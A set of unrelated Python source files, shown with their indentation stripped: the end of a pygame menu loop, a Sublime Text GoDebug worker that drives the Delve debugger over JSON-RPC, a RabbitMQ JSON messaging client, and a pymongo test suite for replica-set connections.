screen.blit(settings_text, (230, 220))
screen.blit(button_image, (164, 280))
screen.blit(quit_text, (245, 290))
pygame.display.flip()
clock.tick(60)
pygame.display.update()
except Exception:
pygame.quit()
sys.exit()
|
sdworker.py
|
import sublime
import threading
import traceback
import sys
import queue
from GoDebug.jsonrpctcp_client import JsonRpcTcpClient
from GoDebug.jsonrpctcp_client import JsonRpcTcpProtocolError
def __start(connect, const, logger):
logger.debug("Start worker")
try:
connect._open(const.HOST, const.PORT)
return True
except:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
return False
def __stop(connect, const, logger):
try:
if connect._is_open():
connect._close()
except:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
logger.debug("Stop worker")
def __default_cfg():
return {
'followPointers': True,
'maxVariableRecurse': 5,
'maxStringLen': 128,
'maxArrayValues': 64,
'maxStructFields': -1
}
def __get_eval_parms(goroutine_id, frame, expr):
return {"Scope": {"GoroutineID": goroutine_id, "Frame": frame}, "Expr": expr, "Cfg": __default_cfg()}
def __get_variable_parms(goroutine_id, frame):
return {"Scope": {"GoroutineID": goroutine_id, "Frame": frame}, "Cfg": __default_cfg()}
def __get_stacktrace_parms(goroutine_id):
# return {"Id": goroutine_id, "Depth": 20, "Full": False, "Cfg": __default_cfg()}
return {"Id": goroutine_id, "Depth": 20}
def __get_current_goroutine(response):
if type(response) is dict:
if 'State' in response:
if not response['State']['exited'] and 'currentThread' in response['State']:
return response['State']['currentThread']['goroutineID']
return None
def __get_error_response(cmd, parms):
return {"cmd": cmd, "parms": parms, "result": False}
def __get_error_response_ex(cmd, parms, e):
return {"cmd": cmd, "parms": parms, "result": False, "error_code": e.code, "error_message": e.message}
def _do_method(alive, queue, prj, worker_callback=None):
const = prj.const
logger = prj.logger
connect = JsonRpcTcpClient(const, logger)
if __start(connect, const, logger):
alive.set()
while alive.isSet():
requests = queue.get()
if requests is None:
alive.clear()
continue
responses = []
errors = False
goroutine_id = None
goroutines = False
frame = 0
watches = None
for request in requests:
cmd = request["cmd"]
parms = request["parms"]
if parms is None:
parms = {}
try:
if cmd in const.RUNTIME_COMMANDS:
parms['name'] = cmd
response = connect.RPCServer.Command(parms)
goroutine_id = __get_current_goroutine(response)
elif cmd == const.STATE_COMMAND:
if errors:
errors = False
response = connect.RPCServer.State(parms)
goroutine_id = __get_current_goroutine(response)
elif cmd == const.CREATE_BREAKPOINT_COMMAND:
response = connect.RPCServer.CreateBreakpoint(parms)
elif cmd == const.CLEAR_BREAKPOINT_COMMAND:
response = connect.RPCServer.ClearBreakpoint({"Id": parms['bkpt_id'], "Name": parms['bkpt_name']})
elif cmd == const.RESTART_COMMAND:
response = connect.RPCServer.Restart(parms)
elif cmd == const.CANCEL_NEXT_COMMAND:
response = connect.RPCServer.CancelNext(parms)
elif cmd == const.STACKTRACE_COMMAND:
response = connect.RPCServer.Stacktrace(__get_stacktrace_parms(parms['goroutine_id']))
elif cmd == const.BREAKPOINT_COMMAND:
response = connect.RPCServer.ListBreakpoints(parms)
elif cmd == const.VARIABLE_COMMAND:
call_parms = __get_variable_parms(parms['goroutine_id'], parms['frame'])
response_locals = connect.RPCServer.ListLocalVars(call_parms)
response_args = connect.RPCServer.ListFunctionArgs(call_parms)
response = {"Locals": response_locals['Variables'], "Arguments": response_args['Args']}
elif cmd == const.WATCH_COMMAND:
if 'goroutine_id' in parms:
goroutine_id = parms['goroutine_id']
frame = parms['frame']
watches = parms['watches']
continue
elif cmd == const.GOROUTINE_COMMAND:
if not goroutines:
goroutines = True
continue
else:
raise ValueError("Unknown worker command: %s" % cmd)
responses.append({"cmd": cmd, "result": True, "response": response})
except JsonRpcTcpProtocolError as e:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
responses.append(__get_error_response_ex(cmd, parms, e))
if cmd not in [const.STATE_COMMAND, const.CREATE_BREAKPOINT_COMMAND, const.CLEAR_BREAKPOINT_COMMAND]:
errors = True
except:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
responses.append(__get_error_response(cmd, parms))
if cmd not in [const.STATE_COMMAND, const.CREATE_BREAKPOINT_COMMAND, const.CLEAR_BREAKPOINT_COMMAND]:
errors = True
parms = {}
if errors:
errors = False
cmd = const.STATE_COMMAND
try:
response = connect.RPCServer.State(parms)
goroutine_id = __get_current_goroutine(response)
responses.append({"cmd": cmd, "result": True, "response": response})
except JsonRpcTcpProtocolError as e:
responses.append(__get_error_response_ex(cmd, parms, e))
errors = True
except:
responses.append(__get_error_response(cmd, parms))
errors = True
if not errors and goroutines:
cmd = const.GOROUTINE_COMMAND
try:
response = connect.RPCServer.ListGoroutines(parms)
found = False
for gr in response['Goroutines']:
if gr['id'] == goroutine_id:
found = True
break
if not found:
goroutine_id = 0
errors = True
responses.append({"cmd": const.GOROUTINE_COMMAND, "result": True, "response": response, "current_goroutine_id": goroutine_id})
except JsonRpcTcpProtocolError as e:
responses.append(__get_error_response_ex(cmd, parms, e))
errors = True
except:
responses.append(__get_error_response(cmd, parms))
errors = True
if not errors and watches is not None and goroutine_id > 0:
cmd = const.WATCH_COMMAND
response_watches = []
for element in watches:
try:
value = connect.RPCServer.Eval(__get_eval_parms(goroutine_id, frame, element['expr']))
response_watches.append({"watch_id": element['watch_id'], "result": True, "eval": value})
except JsonRpcTcpProtocolError as e:
response_watches.append(__get_error_response_ex(cmd, element, e))
except:
response_watches.append(__get_error_response(cmd, element))
responses.append({"cmd": const.WATCH_COMMAND, "result": True, "response": response_watches})
if worker_callback is not None:
# callback
sublime.set_timeout(worker_callback(prj, responses), 0)
__stop(connect, const, logger)
class DlvWorker(object):
def __init__(self, prj, worker_callback = None):
self.__prj = prj
self.__worker_callback = worker_callback
self.__alive = threading.Event()
self.__queue = None
self.__stoped = True
def __start(self):
self.__stoped = False
self.__queue = queue.Queue()
t = threading.Thread(name='worker', target=_do_method, args=(self.__alive, self.__queue, self.__prj, self.__worker_callback))
t.start()
def stop(self):
if self.__queue is not None:
self.__queue.put(None)
self.__stoped = True
def do(self, cmd, parms=None):
self.do_batch([{"cmd": cmd, "parms": parms}])
def do_batch(self, requests):
logger = self.__prj.logger
if not self.__alive.isSet():
logger.warning("Worker not started, put requests to the queue")
if self.__stoped:
self.__start()
if type(requests) is not list:
logger.error("Wrong requests type %s on worker call, list expected" % type(requests))
return
elif len(requests) == 0:
logger.error("Call worker with empty request")
return
self.__queue.put(requests)
|
rabbit_mq_client.py
|
# Copyright 2016 deepsense.ai (CodiLime, Inc)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from threading import Thread
import pika
from pika.exceptions import ConnectionClosed
from utils import Logging
class RabbitMQClient(Logging):
_channel_impl = None
def __init__(self, address, credentials, exchange, exchange_type='topic'):
super(RabbitMQClient, self).__init__()
self._address = address
self._exchange = exchange
self._credentials = credentials
self._exchange_type = exchange_type
self._reset_consumer_thread(start=False)
self._declare_exchange()
def send(self, topic, message):
self._channel.basic_publish(exchange=self._exchange,
routing_key=topic,
body=message)
def subscribe(self, topic, handler):
queue_name = self._channel.queue_declare(exclusive=True).method.queue
self._channel.queue_bind(exchange=self._exchange,
queue=queue_name,
routing_key=topic)
self._channel.basic_consume(handler, queue=queue_name)
if not self._consumer_thread.is_alive():
self._reset_consumer_thread(start=True)
def consume(self, inactivity_timeout, handler, timeout_handler):
queue_name = self._channel.queue_declare(exclusive=True).method.queue
self._channel.queue_bind(exchange=self._exchange,
queue=queue_name)
for message in self._channel.consume(queue=queue_name,
inactivity_timeout=inactivity_timeout):
if message is not None:
handler(self._channel, message)
else:
timeout_handler()
def _declare_exchange(self):
self._channel.exchange_declare(exchange=self._exchange,
exchange_type=self._exchange_type)
def _reset_consumer_thread(self, start):
self._consumer_thread = Thread(target=self._channel.start_consuming)
self._consumer_thread.daemon = True
if start:
assert not self._consumer_thread.is_alive()
self._consumer_thread.start()
@property
def _channel(self):
if not self._channel_impl:
connection = self._establish_connection_to_mq(self._address, self._credentials)
self._channel_impl = connection.channel()
return self._channel_impl
@staticmethod
def _establish_connection_to_mq(address, credentials):
while True:
try:
return pika.BlockingConnection(
pika.ConnectionParameters(host=address[0], port=address[1],
credentials=pika.PlainCredentials(credentials[0], credentials[1])))
except ConnectionClosed:
time.sleep(1)
class RabbitMQJsonSender(Logging):
def __init__(self, rabbit_mq_client, topic):
super(RabbitMQJsonSender, self).__init__()
self._rabbit_mq_client = rabbit_mq_client
self._topic = topic
def send(self, message):
try:
json_message = json.dumps(message)
except Exception as e:
self.logger.debug('JSON serialization failed: {}. Message: {}'.format(e, message))
return
self._rabbit_mq_client.send(topic=self._topic,
message=json_message)
class RabbitMQJsonReceiver(Logging):
def __init__(self, rabbit_mq_client):
super(RabbitMQJsonReceiver, self).__init__()
self._rabbit_mq_client = rabbit_mq_client
def subscribe(self, topic, handler):
self._rabbit_mq_client.subscribe(topic, self._wrapped_handler(handler))
self.logger.debug('Subscribed to topic {}'.format(topic))
@staticmethod
def _wrapped_handler(actual_handler):
# noinspection PyUnusedLocal
def handle(ch, method, properties, body):
message = json.loads(body)
return actual_handler(message)
return handle
|
test_replica_set_connection.py
|
# Copyright 2011-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import copy
import datetime
import os
import signal
import socket
import sys
import time
import thread
import traceback
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo.connection import Connection
from pymongo.read_preferences import ReadPreference
from pymongo.replica_set_connection import ReplicaSetConnection
from pymongo.replica_set_connection import _partition_node
from pymongo.database import Database
from pymongo.pool import SocketInfo
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
OperationFailure)
from test import version
from test.utils import delay, assertReadFrom, assertReadFromAll, read_from_which_host
host = os.environ.get("DB_IP", 'localhost')
port = int(os.environ.get("DB_PORT", 27017))
pair = '%s:%d' % (host, port)
class TestReplicaSetConnectionAgainstStandalone(unittest.TestCase):
"""This is a funny beast -- we want to run tests for ReplicaSetConnection
but only if the database at DB_IP and DB_PORT is a standalone.
"""
def setUp(self):
conn = Connection(pair)
response = conn.admin.command('ismaster')
if 'setName' in response:
raise SkipTest("Connected to a replica set, not a standalone mongod")
def test_connect(self):
self.assertRaises(ConfigurationError, ReplicaSetConnection,
pair, replicaSet='anything',
connectTimeoutMS=600)
class TestConnectionReplicaSetBase(unittest.TestCase):
def setUp(self):
conn = Connection(pair)
response = conn.admin.command('ismaster')
if 'setName' in response:
self.name = str(response['setName'])
self.w = len(response['hosts'])
self.hosts = set([_partition_node(h)
for h in response["hosts"]])
self.arbiters = set([_partition_node(h)
for h in response.get("arbiters", [])])
repl_set_status = conn.admin.command('replSetGetStatus')
primary_info = [
m for m in repl_set_status['members']
if m['stateStr'] == 'PRIMARY'
][0]
self.primary = _partition_node(primary_info['name'])
self.secondaries = [
_partition_node(m['name']) for m in repl_set_status['members']
if m['stateStr'] == 'SECONDARY'
]
else:
raise SkipTest("Not connected to a replica set")
def _get_connection(self, **kwargs):
return ReplicaSetConnection(pair,
replicaSet=self.name,
**kwargs)
class TestConnection(TestConnectionReplicaSetBase):
def test_connect(self):
self.assertRaises(ConnectionFailure, ReplicaSetConnection,
"somedomainthatdoesntexist.org:27017",
replicaSet=self.name,
connectTimeoutMS=600)
self.assertRaises(ConfigurationError, ReplicaSetConnection,
pair, replicaSet='fdlksjfdslkjfd')
self.assertTrue(ReplicaSetConnection(pair, replicaSet=self.name))
def test_repr(self):
connection = self._get_connection()
self.assertEqual(repr(connection),
"ReplicaSetConnection(%r)" % (["%s:%d" % n
for n in
self.hosts],))
def test_properties(self):
c = ReplicaSetConnection(pair, replicaSet=self.name)
c.admin.command('ping')
self.assertEqual(c.primary, self.primary)
self.assertEqual(c.hosts, self.hosts)
self.assertEqual(c.arbiters, self.arbiters)
self.assertEqual(c.max_pool_size, 10)
self.assertEqual(c.document_class, dict)
self.assertEqual(c.tz_aware, False)
# Make sure RSC's properties are copied to Database and Collection
for obj in c, c.pymongo_test, c.pymongo_test.test:
self.assertEqual(obj.read_preference, ReadPreference.PRIMARY)
self.assertEqual(obj.tag_sets, [{}])
self.assertEqual(obj.secondary_acceptable_latency_ms, 15)
self.assertEqual(obj.slave_okay, False)
self.assertEqual(obj.safe, False)
cursor = c.pymongo_test.test.find()
self.assertEqual(
ReadPreference.PRIMARY, cursor._Cursor__read_preference)
self.assertEqual([{}], cursor._Cursor__tag_sets)
self.assertEqual(15, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
c.close()
tag_sets = [{'dc': 'la', 'rack': '2'}, {'foo': 'bar'}]
c = ReplicaSetConnection(pair, replicaSet=self.name, max_pool_size=25,
document_class=SON, tz_aware=True,
slaveOk=False, safe=True,
read_preference=ReadPreference.SECONDARY,
tag_sets=copy.deepcopy(tag_sets),
secondary_acceptable_latency_ms=77)
c.admin.command('ping')
self.assertEqual(c.primary, self.primary)
self.assertEqual(c.hosts, self.hosts)
self.assertEqual(c.arbiters, self.arbiters)
self.assertEqual(c.max_pool_size, 25)
self.assertEqual(c.document_class, SON)
self.assertEqual(c.tz_aware, True)
for obj in c, c.pymongo_test, c.pymongo_test.test:
self.assertEqual(obj.read_preference, ReadPreference.SECONDARY)
self.assertEqual(obj.tag_sets, tag_sets)
self.assertEqual(obj.secondary_acceptable_latency_ms, 77)
self.assertEqual(obj.slave_okay, False)
self.assertEqual(obj.safe, True)
cursor = c.pymongo_test.test.find()
self.assertEqual(
ReadPreference.SECONDARY, cursor._Cursor__read_preference)
self.assertEqual(tag_sets, cursor._Cursor__tag_sets)
self.assertEqual(77, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
cursor = c.pymongo_test.test.find(
read_preference=ReadPreference.NEAREST,
tag_sets=[{'dc':'ny'}, {}],
secondary_acceptable_latency_ms=123)
self.assertEqual(
ReadPreference.NEAREST, cursor._Cursor__read_preference)
self.assertEqual([{'dc':'ny'}, {}], cursor._Cursor__tag_sets)
self.assertEqual(123, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
if version.at_least(c, (1, 7, 4)):
self.assertEqual(c.max_bson_size, 16777216)
else:
self.assertEqual(c.max_bson_size, 4194304)
c.close()
def test_get_db(self):
connection = self._get_connection()
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, connection, "")
self.assertRaises(InvalidName, make_db, connection, "te$t")
self.assertRaises(InvalidName, make_db, connection, "te.t")
self.assertRaises(InvalidName, make_db, connection, "te\\t")
self.assertRaises(InvalidName, make_db, connection, "te/t")
self.assertRaises(InvalidName, make_db, connection, "te st")
self.assertTrue(isinstance(connection.test, Database))
self.assertEqual(connection.test, connection["test"])
self.assertEqual(connection.test, Database(connection, "test"))
connection.close()
def test_auto_reconnect_exception_when_read_preference_is_secondary(self):
c = self._get_connection()
db = c.pymongo_test
def raise_socket_error(*args, **kwargs):
raise socket.error
old_sendall = socket.socket.sendall
socket.socket.sendall = raise_socket_error
try:
cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
self.assertRaises(AutoReconnect, cursor.next)
finally:
socket.socket.sendall = old_sendall
def test_operations(self):
c = self._get_connection()
# Check explicitly for a case we've commonly hit in tests:
# a replica set is started with a tiny oplog, a previous
# test does a big insert that leaves the secondaries
# permanently "RECOVERING", and our insert(w=self.w) hangs
# forever.
rs_status = c.admin.command('replSetGetStatus')
members = rs_status['members']
self.assertFalse(
[m for m in members if m['stateStr'] == 'RECOVERING'],
"Replica set is recovering, try a larger oplogSize next time"
)
db = c.pymongo_test
db.test.remove({}, safe=True)
self.assertEqual(0, db.test.count())
db.test.insert({'foo': 'x'}, safe=True, w=self.w, wtimeout=10000)
self.assertEqual(1, db.test.count())
cursor = db.test.find()
doc = cursor.next()
self.assertEqual('x', doc['foo'])
# Ensure we read from the primary
self.assertEqual(c.primary, cursor._Cursor__connection_id)
cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
doc = cursor.next()
self.assertEqual('x', doc['foo'])
# Ensure we didn't read from the primary
self.assertTrue(cursor._Cursor__connection_id in c.secondaries)
self.assertEqual(1, db.test.count())
db.test.remove({}, safe=True)
self.assertEqual(0, db.test.count())
db.test.drop()
c.close()
def test_database_names(self):
connection = self._get_connection()
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
connection.close()
def test_drop_database(self):
connection = self._get_connection()
self.assertRaises(TypeError, connection.drop_database, 5)
self.assertRaises(TypeError, connection.drop_database, None)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database("pymongo_test")
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database(connection.pymongo_test)
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.close()
def test_copy_db(self):
c = self._get_connection()
self.assertTrue(c.in_request())
self.assertRaises(TypeError, c.copy_database, 4, "foo")
self.assertRaises(TypeError, c.copy_database, "foo", 4)
self.assertRaises(InvalidName, c.copy_database, "foo", "$foo")
c.pymongo_test.test.drop()
c.drop_database("pymongo_test1")
c.drop_database("pymongo_test2")
c.pymongo_test.test.insert({"foo": "bar"})
self.assertFalse("pymongo_test1" in c.database_names())
self.assertFalse("pymongo_test2" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1")
# copy_database() didn't accidentally end the request
self.assertTrue(c.in_request())
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.end_request()
self.assertFalse(c.in_request())
c.copy_database("pymongo_test", "pymongo_test2", pair)
# copy_database() didn't accidentally restart the request
self.assertFalse(c.in_request())
time.sleep(1)
self.assertTrue("pymongo_test2" in c.database_names())
self.assertEqual("bar", c.pymongo_test2.test.find_one()["foo"])
if version.at_least(c, (1, 3, 3, 1)):
c.drop_database("pymongo_test1")
c.pymongo_test.add_user("mike", "password")
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="foo", password="bar")
self.assertFalse("pymongo_test1" in c.database_names())
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="mike", password="bar")
self.assertFalse("pymongo_test1" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1",
username="mike", password="password")
self.assertTrue("pymongo_test1" in c.database_names())
time.sleep(2)
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.close()
def test_iteration(self):
connection = self._get_connection()
def iterate():
[a for a in connection]
self.assertRaises(TypeError, iterate)
connection.close()
def test_disconnect(self):
c = self._get_connection()
coll = c.foo.bar
c.disconnect()
c.disconnect()
coll.count()
c.disconnect()
c.disconnect()
coll.count()
def test_fork(self):
"""Test using a connection before and after a fork.
"""
if sys.platform == "win32":
raise SkipTest("Can't fork on Windows")
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest("No multiprocessing module")
db = self._get_connection().pymongo_test
# Failure occurs if the connection is used before the fork
db.test.find_one()
#db.connection.end_request()
def loop(pipe):
while True:
try:
db.test.insert({"a": "b"}, safe=True)
for _ in db.test.find():
pass
except:
traceback.print_exc()
pipe.send(True)
os._exit(1)
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
# recv will only have data if the subprocess failed
try:
cp1.recv()
self.fail()
except EOFError:
pass
try:
cp2.recv()
self.fail()
except EOFError:
pass
db.connection.close()
def test_document_class(self):
c = self._get_connection()
db = c.pymongo_test
db.test.insert({"x": 1})
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.close()
c = self._get_connection(document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.close()
def test_network_timeout(self):
no_timeout = self._get_connection()
timeout_sec = 1
timeout = self._get_connection(socketTimeoutMS=timeout_sec*1000)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert({"x": 1}, safe=True)
# A $where clause that takes a second longer than the timeout
where_func = delay(1 + timeout_sec)
def get_x(db):
doc = db.test.find().where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(ConnectionFailure, get_x, timeout.pymongo_test)
def get_x_timeout(db, t):
doc = db.test.find(network_timeout=t).where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x_timeout(timeout.pymongo_test, None))
self.assertRaises(ConnectionFailure, get_x_timeout,
no_timeout.pymongo_test, 0.1)
no_timeout.close()
timeout.close()
def test_tz_aware(self):
self.assertRaises(ConfigurationError, ReplicaSetConnection,
tz_aware='foo', replicaSet=self.name)
aware = self._get_connection(tz_aware=True)
naive = self._get_connection()
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert({"x": now}, safe=True)
time.sleep(1)
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
def test_ipv6(self):
try:
connection = ReplicaSetConnection("[::1]:%d" % (port,),
replicaSet=self.name)
except:
# Either mongod was started without --ipv6
# or the OS doesn't support it (or both).
raise SkipTest("No IPv6")
# Try a few simple things
connection = ReplicaSetConnection("mongodb://[::1]:%d" % (port,),
replicaSet=self.name)
connection = ReplicaSetConnection("mongodb://[::1]:%d/?safe=true;"
"replicaSet=%s" % (port, self.name))
connection = ReplicaSetConnection("[::1]:%d,localhost:"
"%d" % (port, port),
replicaSet=self.name)
connection = ReplicaSetConnection("localhost:%d,[::1]:"
"%d" % (port, port),
replicaSet=self.name)
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_bernie.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
connection.close()
def _test_kill_cursor_explicit(self, read_pref):
c = self._get_connection(read_preference=read_pref)
db = c.pymongo_test
db.drop_collection("test")
test = db.test
test.insert([{"i": i} for i in range(20)], w=1 + len(c.secondaries))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
cursor.next()
self.assertNotEqual(0, cursor.cursor_id)
connection_id = cursor._Cursor__connection_id
writer = c._ReplicaSetConnection__writer
if read_pref == ReadPreference.PRIMARY:
msg = "Expected cursor's connection_id to be %s, got %s" % (
writer, connection_id)
self.assertEqual(connection_id, writer, msg)
else:
self.assertNotEqual(connection_id, writer,
"Expected cursor's connection_id not to be primary")
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_kill_cursor_explicit_primary(self):
self._test_kill_cursor_explicit(ReadPreference.PRIMARY)
def test_kill_cursor_explicit_secondary(self):
self._test_kill_cursor_explicit(ReadPreference.SECONDARY)
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure Connection closes its
# socket if it gets an interrupt while waiting to recv() from it.
c = self._get_connection()
db = c.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert({'_id': 1}, safe=True)
old_signal_handler = None
try:
# Platform-specific hacks for raising a KeyboardInterrupt on the main
# thread while find() is in-progress: On Windows, SIGALRM is unavailable
# so we use second thread. In our Bamboo setup on Linux, the thread
# technique causes an error in the test at sock.recv():
# TypeError: 'int' object is not callable
# We don't know what causes this in Bamboo, so we hack around it.
if sys.platform == 'win32':
def interrupter():
time.sleep(0.25)
# Raises KeyboardInterrupt in the main thread
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
else:
# Convert SIGALRM to SIGINT -- it's hard to schedule a SIGINT for one
# second in the future, but easy to schedule SIGALRM.
def sigalarm(num, frame):
raise KeyboardInterrupt
old_signal_handler = signal.signal(signal.SIGALRM, sigalarm)
signal.alarm(1)
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
db.foo.find({'$where': where}).next()
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected ConnectionFailure")
# Raises AssertionError due to PYTHON-294 -- Mongo's response to the
# previous find() is still waiting to be read on the socket, so the
# request id's don't match.
self.assertEqual(
{'_id': 1},
db.foo.find().next()
)
finally:
if old_signal_handler:
signal.signal(signal.SIGALRM, old_signal_handler)
def test_operation_failure_without_request(self):
# Ensure ReplicaSetConnection doesn't close socket after it gets an
# error response to getLastError. PYTHON-395.
c = self._get_connection(auto_start_request=False)
pool = c._ReplicaSetConnection__members[self.primary].pool
self.assertEqual(1, len(pool.sockets))
old_sock_info = iter(pool.sockets).next()
c.pymongo_test.test.drop()
c.pymongo_test.test.insert({'_id': 'foo'}, safe=True)
self.assertRaises(
OperationFailure,
c.pymongo_test.test.insert, {'_id': 'foo'}, safe=True)
self.assertEqual(1, len(pool.sockets))
new_sock_info = iter(pool.sockets).next()
self.assertEqual(old_sock_info, new_sock_info)
c.close()
def test_operation_failure_with_request(self):
# Ensure ReplicaSetConnection doesn't close socket after it gets an
# error response to getLastError. PYTHON-395.
c = self._get_connection(auto_start_request=True)
c.pymongo_test.test.find_one()
pool = c._ReplicaSetConnection__members[self.primary].pool
# Connection has reserved a socket for this thread
self.assertTrue(isinstance(pool._get_request_state(), SocketInfo))
old_sock_info = pool._get_request_state()
c.pymongo_test.test.drop()
c.pymongo_test.test.insert({'_id': 'foo'}, safe=True)
self.assertRaises(
OperationFailure,
c.pymongo_test.test.insert, {'_id': 'foo'}, safe=True)
# OperationFailure doesn't affect the request socket
self.assertEqual(old_sock_info, pool._get_request_state())
c.close()
def test_auto_start_request(self):
for bad_horrible_value in (None, 5, 'hi!'):
self.assertRaises(
(TypeError, ConfigurationError),
lambda: self._get_connection(auto_start_request=bad_horrible_value)
)
# auto_start_request should default to True
conn = self._get_connection()
pools = [mongo.pool for mongo in
conn._ReplicaSetConnection__members.values()]
self.assertTrue(conn.auto_start_request)
self.assertTrue(conn.in_request())
# Trigger the RSC to actually start a request
conn.test.test.find_one()
for pool in pools:
self.assertTrue(pool.in_request())
conn.end_request()
self.assertFalse(conn.in_request())
for pool in pools:
self.assertFalse(pool.in_request())
conn.start_request()
self.assertTrue(conn.in_request())
conn.close()
conn = self._get_connection(auto_start_request=False)
self.assertFalse(conn.in_request())
conn.start_request()
self.assertTrue(conn.in_request())
conn.end_request()
self.assertFalse(conn.in_request())
conn.close()
def test_schedule_refresh(self):
# Monitor thread starts waiting for _refresh_interval, 30 seconds
conn = self._get_connection()
# Reconnect if necessary
conn.pymongo_test.test.find_one()
secondaries = conn.secondaries
for secondary in secondaries:
conn._ReplicaSetConnection__members[secondary].up = False
conn._ReplicaSetConnection__members[conn.primary].up = False
# Wake up monitor thread
conn._ReplicaSetConnection__schedule_refresh()
# Refresh interval is 30 seconds; scheduling a refresh tells the
# monitor thread / greenlet to start a refresh now. We still need to
# sleep a few seconds for it to complete.
time.sleep(5)
for secondary in secondaries:
self.assertTrue(conn._ReplicaSetConnection__members[secondary].up,
"ReplicaSetConnection didn't detect secondary is up")
self.assertTrue(conn._ReplicaSetConnection__members[conn.primary].up,
"ReplicaSetConnection didn't detect primary is up")
